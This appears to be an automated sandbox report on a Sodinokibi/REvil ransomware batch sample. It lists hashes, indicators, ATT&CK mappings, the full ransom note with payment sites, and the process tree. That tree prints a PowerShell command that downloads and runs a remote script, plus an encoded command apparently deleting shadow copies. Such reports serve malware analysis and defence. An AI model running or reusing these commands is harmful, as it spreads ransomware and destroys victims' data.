sodinokibi | 25ef88f973e50b6cd72f2dd572618de7302e12a2925429568598205dc85a9585

General

Target

703f05dca6cfaba3626152c6d4d1fcd6.bat
Size

220B
MD5

0a6ac1495b26f97102dc547e02722707
SHA1

a15c39e75f663c0e0ee152ac9c09541ffd6d1221
SHA256

25ef88f973e50b6cd72f2dd572618de7302e12a2925429568598205dc85a9585
SHA512

04b8fffa2dc6bb4b867392c307ae9472849b6872b8fca42568fec4ee07e76d09f41ff16007725b36a86ce3f45fabd6c5f86ac2ff26c71805cd11213bff539c2a

Score

10^/10

ransomware persistence sodinokibi

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/703f05dca6cfaba3626152c6d4d1fcd6

Extracted

Path

C:\5i0ubx-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 5i0ubx. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2122EC22BD4D0BB7 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/2122EC22BD4D0BB7 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: VX5vEIG5di+XARzDddNQET0mzTDcWHfcginfiykZkVHh5TS8uiRueTA3stcFTwvM I49Q3RKawGVp5lhgxuwJBRLCOJyymlwZMO2TJp2KCmMvilN7QXh0HW/ki5F+rjQn Hu/5LxxbVJR3foFjMKMvTC51RL2kyvseHeaLBZff4Hl7tidbgpUZnIiYGQ3lJIKF lUhXaJD/82AJto+qaZiO4fJjayvf+/B1qZLcRxWSAq5N1tT4ThO0YrXw9a/Jpq28 vvDkCCZVLHeZIl0Z8q9ncmVoppC7Hqw1F8AN1PxC00RC/VeaGmcf2HtoiykpaT+H sOvoD2PSODI2pjwInqtt+oGC8Bg7P/8Sr+JY5u17e0Rz5vnvBS3r7xmOBWaU+Uuz lvmd52lXx+LyZ5FiSQanQN4bhJzyZ5sSD2i28StM1sYGcnXWoff09CYnNwyU5VBd 6Af64phnxXdISkI2k4CTvqgpMbk0jLzysgMbVGOZHvGYESEZwKqWmTXn6Oz25QQP PBUFM66IdmxF/8xaf2bpG5i9xUc33PIOIpmGMnQ4Bwz1GIHFiG7MI94jAJXa1QqW akJ1rG8LF/HoXC0WBEQMUAP0N7YX7lT5mboQ94Rp6fNdhK5UnSjIRekgZ7GmA7PK 8j55aiWZHWtWpyRXSBqZkNNFVBHs4v1gx/MFZlw0OFopmvtjwzx7usyOZHuiOtBQ FbytwvLc++lBgQEEYLteaZqm1W+3DVexnIWdkS4/0rbE1SYFoJ2qr2bqaqhtQdH2 9Em6kkDe90pDzr/sVV2wBa3spEMOxuJlps8k0nSxiXvRU8FfA06iJeBKU6hr00wX SFgIa7FpY9QY9FZWI7VheRG+2lpVGbn0kyBPr8LyYe82hD/OXK7ACVghlbWXOi/K 3PkY61UTSbL8tWeks6czH4EBAh3fUEuM7GxABZclAZXzxqzUumY158a6fX0I6vMI +FBfetKw+y156hOMrJ4J2sXRcsHxwF/PAanmkbe0W85U/5wcRRkdoBhfgK+moK+K fqJMhvnKqyPw92a48/X4hvZkFjSPZoLGqTjqIiH/inVOt4U49p1ykd9di+p6V2kL L2ui4W3Z/ylgNknRq5ZPpOyI8LHr5Df5wqCAOcRR1RrBQBb6Q5Gyx9eykGljOBrk uPJc3xEGu5Y7p/frtQAPqZzLOhyGrhDni1UiTmD7+L595xDaHsW7yxGYd8mDmalj HDJ/MhtoVxtVE5/GZ+xq7meU0QiWsiou2xl7930zgixpm2qKEDjX7logAwdZAIrP w5lPPunEQHc8Y0kGqzew0w== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2122EC22BD4D0BB7

http://decryptor.cc/2122EC22BD4D0BB7

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Blacklisted process makes network request 119 IoCs

Processes:

powershell.exe

flow	pid	process
10	1440	powershell.exe
23	1440	powershell.exe
25	1440	powershell.exe
27	1440	powershell.exe
29	1440	powershell.exe
31	1440	powershell.exe
34	1440	powershell.exe
36	1440	powershell.exe
38	1440	powershell.exe
39	1440	powershell.exe
41	1440	powershell.exe
42	1440	powershell.exe
44	1440	powershell.exe
46	1440	powershell.exe
48	1440	powershell.exe
49	1440	powershell.exe
51	1440	powershell.exe
53	1440	powershell.exe
55	1440	powershell.exe
57	1440	powershell.exe
59	1440	powershell.exe
61	1440	powershell.exe
63	1440	powershell.exe
66	1440	powershell.exe
68	1440	powershell.exe
70	1440	powershell.exe
72	1440	powershell.exe
75	1440	powershell.exe
77	1440	powershell.exe
79	1440	powershell.exe
81	1440	powershell.exe
83	1440	powershell.exe
85	1440	powershell.exe
87	1440	powershell.exe
89	1440	powershell.exe
91	1440	powershell.exe
93	1440	powershell.exe
95	1440	powershell.exe
97	1440	powershell.exe
100	1440	powershell.exe
102	1440	powershell.exe
104	1440	powershell.exe
106	1440	powershell.exe
108	1440	powershell.exe
110	1440	powershell.exe
112	1440	powershell.exe
115	1440	powershell.exe
117	1440	powershell.exe
119	1440	powershell.exe
121	1440	powershell.exe
123	1440	powershell.exe
125	1440	powershell.exe
127	1440	powershell.exe
129	1440	powershell.exe
131	1440	powershell.exe
133	1440	powershell.exe
135	1440	powershell.exe
137	1440	powershell.exe
139	1440	powershell.exe
141	1440	powershell.exe
143	1440	powershell.exe
145	1440	powershell.exe
146	1440	powershell.exe
147	1440	powershell.exe

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\EnableSelect.tif => \??\c:\users\admin\pictures\EnableSelect.tif.5i0ubx	powershell.exe
File renamed	C:\Users\Admin\Pictures\MeasureInitialize.png => \??\c:\users\admin\pictures\MeasureInitialize.png.5i0ubx	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\MountEdit.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\DebugPublish.tif => \??\c:\users\admin\pictures\DebugPublish.tif.5i0ubx	powershell.exe
File renamed	C:\Users\Admin\Pictures\OutWrite.png => \??\c:\users\admin\pictures\OutWrite.png.5i0ubx	powershell.exe
File renamed	C:\Users\Admin\Pictures\ReadSkip.tif => \??\c:\users\admin\pictures\ReadSkip.tif.5i0ubx	powershell.exe
File renamed	C:\Users\Admin\Pictures\SuspendPop.raw => \??\c:\users\admin\pictures\SuspendPop.raw.5i0ubx	powershell.exe
File renamed	C:\Users\Admin\Pictures\ApproveGet.crw => \??\c:\users\admin\pictures\ApproveGet.crw.5i0ubx	powershell.exe
File renamed	C:\Users\Admin\Pictures\MountEdit.tiff => \??\c:\users\admin\pictures\MountEdit.tiff.5i0ubx	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\460.bmp"	powershell.exe

Drops file in Program Files directory 13 IoCs

Processes:

powershell.exe

description	ioc	process
File created	\??\c:\program files\5i0ubx-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\CompressMeasure.dot	powershell.exe
File opened for modification	\??\c:\program files\ConvertToAssert.ini	powershell.exe
File opened for modification	\??\c:\program files\ReadUnregister.avi	powershell.exe
File opened for modification	\??\c:\program files\ReceiveSuspend.i64	powershell.exe
File opened for modification	\??\c:\program files\RenameUninstall.au	powershell.exe
File opened for modification	\??\c:\program files\RestartExit.vstm	powershell.exe
File opened for modification	\??\c:\program files\SwitchProtect.mp3	powershell.exe
File opened for modification	\??\c:\program files\UninstallRepair.3gp	powershell.exe
File opened for modification	\??\c:\program files\UpdatePop.dwg	powershell.exe
File opened for modification	\??\c:\program files\WatchWait.css	powershell.exe
File created	\??\c:\program files (x86)\5i0ubx-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ReadJoin.bat	powershell.exe

Drops file in Windows directory 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat svchost.exe

description	ioc	process
File opened for modification	C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat	svchost.exe

Modifies data under HKEY_USERS 6 IoCs

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = d0062de1407ed601	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exe

pid	process
1440	powershell.exe
1440	powershell.exe
1440	powershell.exe
1440	powershell.exe
1440	powershell.exe
2052	powershell.exe
2052	powershell.exe
2052	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

svchost.exepowershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeShutdownPrivilege	3584	svchost.exe
Token: SeCreatePagefilePrivilege	3584	svchost.exe
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	2052	powershell.exe
Token: SeBackupPrivilege	2208	vssvc.exe
Token: SeRestorePrivilege	2208	vssvc.exe
Token: SeAuditPrivilege	2208	vssvc.exe
Token: SeTakeOwnershipPrivilege	1440	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 408 wrote to memory of 1440	408	cmd.exe	powershell.exe
PID 408 wrote to memory of 1440	408	cmd.exe	powershell.exe
PID 408 wrote to memory of 1440	408	cmd.exe	powershell.exe
PID 1440 wrote to memory of 2052	1440	powershell.exe	powershell.exe
PID 1440 wrote to memory of 2052	1440	powershell.exe	powershell.exe
PID 1440 wrote to memory of 2052	1440	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\703f05dca6cfaba3626152c6d4d1fcd6.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:408

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/703f05dca6cfaba3626152c6d4d1fcd6');Invoke-EQAQDZNHEGRIN;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1440

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3584

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:2208

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1440-0-0x0000000000000000-mapping.dmp

Download
memory/1440-1-0x00000000736F0000-0x0000000073DDE000-memory.dmp

Filesize
6.9MB

Download
memory/1440-2-0x0000000004B30000-0x0000000004B31000-memory.dmp

Filesize
4KB

Download
memory/1440-3-0x0000000007570000-0x0000000007571000-memory.dmp

Filesize
4KB

Download
memory/1440-4-0x0000000007480000-0x0000000007481000-memory.dmp

Filesize
4KB

Download
memory/1440-5-0x0000000007C50000-0x0000000007C51000-memory.dmp

Filesize
4KB

Download
memory/1440-6-0x0000000007EA0000-0x0000000007EA1000-memory.dmp

Filesize
4KB

Download
memory/1440-7-0x0000000007F30000-0x0000000007F31000-memory.dmp

Filesize
4KB

Download
memory/1440-8-0x0000000007F10000-0x0000000007F11000-memory.dmp

Filesize
4KB

Download
memory/1440-9-0x0000000008890000-0x0000000008891000-memory.dmp

Filesize
4KB

Download
memory/1440-10-0x0000000008650000-0x0000000008651000-memory.dmp

Filesize
4KB

Download
memory/1440-11-0x0000000009DB0000-0x0000000009DB1000-memory.dmp

Filesize
4KB

Download
memory/1440-12-0x0000000009330000-0x0000000009331000-memory.dmp

Filesize
4KB

Download
memory/2052-13-0x0000000000000000-mapping.dmp

Download
memory/2052-14-0x00000000736F0000-0x0000000073DDE000-memory.dmp

Filesize
6.9MB

Download
memory/2052-24-0x0000000009150000-0x0000000009151000-memory.dmp

Filesize
4KB

Download
memory/2052-26-0x00000000091F0000-0x00000000091F1000-memory.dmp

Filesize
4KB

Download
memory/2052-27-0x00000000097E0000-0x00000000097E1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads